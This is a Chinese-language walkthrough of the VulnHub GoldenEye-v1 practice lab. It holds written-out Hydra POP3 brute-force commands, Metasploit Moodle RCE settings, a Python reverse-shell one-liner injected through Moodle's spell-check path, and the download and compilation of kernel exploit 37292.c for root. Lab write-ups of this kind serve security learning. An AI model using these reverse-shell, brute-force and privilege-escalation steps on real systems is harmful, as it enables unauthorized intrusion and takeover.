vulnhub靶场{GoldenEye-v1靶场实战}
远赴人间今鸿雁。一睹人间盛世言。
GoldenEye-v1
环境:
vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/
kali主机:192.168.231.138
GoldenEye-v1靶机:192.168.231.143
提示:以下是本篇文章正文内容,下面案例可供参考,
一,信息收集:
1、获取对应的靶机IP:
扫描IP地址 确定IP地址 IP:192.168.231.143
命令:nmap -sP 192.168.231.0/24
2,获取靶机端口、操作系统版本信息:
扫描IP查看打开端口信息
- 在这里我们可以看到IP开发4个端口 /
- 25 smtp端口服务 邮件传输协议 / open smtp(简单邮件传输服务)
- 80 apache服务2.4.7 Ubuntu系统 / open http(超文本传输协议)
- 55006/tcp ssl保密协议 /open ssl/pop3(pop3被用户代理用来邮件服务器取得邮件
- 55007/tcp pop3服务 邮局协议 / open pop3
- 我们直接在网站get输入IP地址 80 端口
我们根据页面提示进去 网站已经提示 /ser-home/ 输入网站登陆界面
也不知道密码 也没有办法登陆 我们先试一下弱密码吧 admin admin123 admin123456
不过密码不对 , 可以看一下网页代码源 有没有我们需要的信息
可以看到有两个文件 index.css 和 terminal.js - Index.css
- terminal.js
在index.css文件里面到是没有什么有用的 不过在terminal.js文件里面结果我们翻译发现有两个名字
鲍里斯 Boris
娜塔莉亚 Natalya
在这注释里面我们从这两个人的对话中间可以得到
密码InvincibleHack3r 因为这编码方式是html编码 我们用Burp进行解码 解码原文为 InvincibleHack3r
我们用这个两个人名做账号 可以试一试可不可以登陆进去
账号:Boris /InvincibleHack3r Natalya/lnvincibleHack3r 试一下登陆失败 我想起来这个是Ubuntu系统 大小写敏感 我们试一下小写
最后密码为boris /InvincibleHack3r
登陆成功,这页面没有什么其他,我们还是查看一下页面代码源吧,我们在代码源最低部发现了一句话
里面提到了 合格的黄金眼网络运营商主管: Natalya ,Boris 这两个人名 我们之前登陆也是使用的这两个名字 ,在之前端口扫描的时间扫描到了 55007 邮件协议 而看到这页面想起来是否可以爆破邮箱
试一下吧
Echo -e “natalya\boris” > user.txt
Hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.231.143 -s 55007 pop3
[55007][pop3] host: 192.168.231.143 login: natalya password: bird
[55007][pop3] host: 192.168.231.143 login: boris password: secret1!
账号 natalya 密码: bird 账号:boris 密码: secret1!
我们登陆邮箱查看一下 使用nc登陆 在这里要说一下pop3的命令
#### POP3 命令包括
USER username 认证用户名
PASS password 认证密码认证,认证通过则状态转换
APOP name,digest 认可一种安全传输口令的办法,执行成功导致状态转换,请参见 RFC 1321 。
STAT 处理请求 server 回送邮箱统计资料,如邮件数、 邮件总字节数
UIDL n 处理 server 返回用于该指定邮件的唯一标识, 如果没有指定,返回所有的。
LIST n 处理 server 返回指定邮件的大小等
RETR n 处理 server 返回邮件的全部文本
DELE n 处理 server 标记删除,QUIT 命令执行时才真正删除
RSET 处理撤消所有的 DELE 命令
TOP n,m 处理 返回 n 号邮件的前 m 行内容,m 必须是自然数
NOOP 处理 server 返回一个肯定的响应
QUIT 希望结束会话。如果 server 处于"处理" 状态,则现在进入"更新"状态,删除那些标记成删除的邮件。如果 server 处于"认可"状态,则结束会话时 server 不进入"更新"状态 。
我们在使用nc链接
第一份邮箱内容:
第二份邮箱内容:
用户名:xenia 密码:RCP90rulez! 域名:severnaya-station.com 网址:severnaya-station.com/gnocertdir 我们现根据邮件提示添加本地域名:severnaya-station.com
我们已经最大这用户名为 就可以去爆破去试一试
Echo doak > user.txt
Hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.231.143 -s 55007 pop3
[55007][pop3] host: 192.168.231.143 login: doak password: goat
二、查找漏洞、漏洞利用:
1、查看历史漏洞
先查看搭网址的软件信息得到:
我们发现这个博客是moodle2.2.3版本的,我们去百度什么搜索src 或者cve 看看这个版本在网站上面有没有已经曝光的漏洞
谷歌上面搜索
2 、获取shell
在msfconsole上面搜索exp
Search moodle
Use 1 选择exploit/multi/http/moodle_spelling_binary_rce
Shwo options
需要设置用户名和密码 我们使用 用户名:xenia 密码:RCP90rulez! 试一下
Set username xenia —设置用户名
Set password RCP90rulez! —设置密码
Set rhosts severnaya-station.com —设置:
Set targeturi /gnocertdir —设置目录: /gnocertdir
set payload cmd/unix/reverse —设置 payload:cmd/unix/reverse
Set lhost 192.168.231.138(需要本地IP)
exploit ----执行命令 错误://好像是提示创建会话失败 权限不大 寻找一下admin账号试一试 看看可不可以找到admin账号密码吧
还是先看看刚才爆破doak的邮箱吧 密码goat
可以看到 下面的账号和密码是severnaya-station.com/gnocertdir网站的登陆账号和密码 账号:dr_doak 密码:4England! 登陆之后我们发现在主页有一个私人文件 也不知道是什么,我们下载打开看看
也不知道这是什么 经过翻译之后的意思是说 /dir007key/for-007.jpg 这个地址的图片有趣 怎么有趣的法也不知道 我们打开这网站看看这图片吧先 这是个什么东西???
还是先下载下来分析分析照片吧 既然说了 就看看这照片的详细内容吧 在标题和主题的位置好像是编码 解码试一试 看看是什么吧 eFdpbnRlcjE5OTV4IQ== 解码等到的是
xWinter1995x! 结合上面下载的s3cret.txt 有可能是 账号admin 密码 xWinter1995x! 我们登陆网站看一下是不是admin密码
登陆成功 用admin账号 使用msfconsole 的moodle exp漏洞打一下试一下
Shwo options
需要设置用户名和密码 我们使用 用户名:xenia 密码:RCP90rulez! 试一下
Set username admin —设置用户名
Set password xWinter1995x! —设置密码
Set rhosts severnaya-station.com —设置:
Set targeturi /gnocertdir —设置目录: /gnocertdir
set payload cmd/unix/reverse —设置 payload:cmd/unix/reverse
Set lhost 192.168.231.138(需要本地IP)
exploit ----执行命令 错误//和之前一起,还是寻找其他办法吧
还是在网页上面找找漏洞吧 然在网页 Home / ▶ Site administration / ▶ Plugins / ▶ Text editors / ▶ TinyMCE HTML editor 这位置 由于我们已经使用了管理员admin用户登录页面,需要在设置中修改:
Home / ► Site administration / ► Server / ► System paths
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.231.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Home / ► My profile / ► Blogs / ► Add a new entry 在这位置输入 , 执行命令
Kali nc 监听 nc -lvp 6666
获得了反弹shell,www-data权限的shell了 因为获得的权限无正常交互:
python -c ‘import pty; pty.spawn("/bin/bash")’ —将shell进行tty
uname -a # 查看权限
3,提升权限
然后在 网站谷歌 上面搜索这版本 提权
获得exp版本:37292.c可进行利用进行内核提权。 我们在kali自带exp搜索
Searchsploit 37292 —搜索kali本地的exp库中37292攻击脚本信息
Cp /usr/share/exploitdb/exploits/linux/local/37292.c /home 复制文件移动到—地址随意
然后吧 gedit 37292.c —文本打开 第143行将gcc改为cc —编写下
我们在37292.c 这文件所在位置python打开http服务 python3 -m http.server 8081 然后在我们反弹shell的主机下载这个文件 命令:wget http://192.168.231.139/37292.c
我们使用c语言编译这文件 cc -o exp 37292.c 编译37292.c 文件 然后 直接一些exp就可以了 在个exp一个执行权限 chmod +x exp
获得flag:568628e0d993b1973adc718237da6e93
vulnhub靶场{GoldenEye-v1靶场实战}相关推荐
- 红队渗透靶场之W1R3S靶场(超详细!)
W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...
- 使用APMServ搭建DVWA靶场、sqli-labs靶场——超详细
文章目录 前言 一.搭建环境(APMServ) 1.安装APMServ 2.配置MySQL数据库 ①管理msyql数据库 ②登录(默认密码为空) ③选择mysql数据库 ④执行sql语句 ⑤重启APM ...
- vulnhub之unknowndevice64-V1.0渗透实战
vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 ...
- vulnhub之CH4INRULZ渗透测试实战
vulnhub之CH4INRULZ渗透测试实战 一.环境搭建 目标: 获取root权限,并获得flag 难度:中级 下载链接:https://download.vulnhub.com/ch4inrul ...
- vulnhub靶场GoldenEye靶场
靶场信息: 地址:GoldenEye: 1 ~ VulnHub 发布日期:2018年5月4日 目标:得到root权限并且找到flag.txt 难度:中级(CTF) hint: Useful to he ...
- Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3
靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成. 这个题目是两阶段flag标志获取,普通用户和root分别有fla ...
- 攻防靶场|Vulnstack2靶场之CS实战
作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 简介 最近学点攻防,拿靶场练练手,大佬轻喷哈. 靶场简介: 红队实战系列,主要以真实企业环境为实例搭建 ...
- DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
目录 一. 环境搭建 1. 准备工具 渗透利器kali DC-1靶场机 2. 安装过程 二. 渗透过程 1. 信息收集 ①探测目标IP地址 ②探测目标IP开放端口 ③网页信息收集 2. 漏洞查找与利用 ...
- DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 ...
- DC-5靶场下载及渗透实战详细过程(DC靶场系列)
目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. 页面信息探测 二. 渗透过程 1. 寻找包含文件的参数 2. Nginx日志文件包含 3. 反弹shell 4. Linux ...
最新文章
- java.sql.SQLException: Lock wait timeout exceeded
- python切片语法-Python切片详解
- 基于Linux的集群系统(八)--转
- python—web页面操作之3种等待方式
- pic10f220 c语言,PIC10F200 LED流水灯程序
- 【论文阅读】A Gentle Introduction to Graph Neural Networks [图神经网络入门](5)
- 开源服务器Tornado的初步了解
- python choice添加下拉框_自定义Django Form中choicefield下拉菜单选取数据库内容实例...
- .net如何引用该命名空间
- Pycharm中设置py文件头部注释信息
- ionic4 集成极光推送jpush
- Union/find--不相交集类(并查集)
- 【OpenCV】音符提取(形态学实例)
- eclipse jstl包_我的Java Web之路41 - JSTL初步使用
- FCC算法题--Validate US Telephone Numbers
- C++父类和子类同名函数及继承关系---多态
- 学习笔记(2):模拟登陆抽屉网(ajax)
- histogram函数 python_Python numpy.histogram函数方法的使用
- html 登录页面模板
- XDOJ-歌德巴赫猜想-35
热门文章
- RT1052的LPI2C配置
- 软件卸载清理工具IObit Uninstaller Pro 中文版的下载、安装与注册激活教程
- 关于tomcat点击startup.bat出现闪退,输入http://localhost:8080网页打不开的解决方法
- f2fs学习笔记 - 5. f2fs基本类图
- python编写米字格的步骤,word2013书法字帖的制作方法(包括口字格、田字格、田回格、九宫格和米字格)...
- VS编写简单的网游客户端
- 使用jQuery与后端进行数据传输代码示例
- 项目管理之产品交付1
- jsp写php一句话,asp,aspx,php,jsp下的一句话木马
- 【unity】分享一个2D小游戏的完整制作教程——涂鸦跳跃demo